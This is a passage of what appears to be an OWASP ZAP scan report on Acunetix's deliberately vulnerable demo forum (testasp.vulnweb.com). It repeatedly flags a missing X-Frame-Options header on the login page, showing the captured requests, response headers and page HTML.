scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
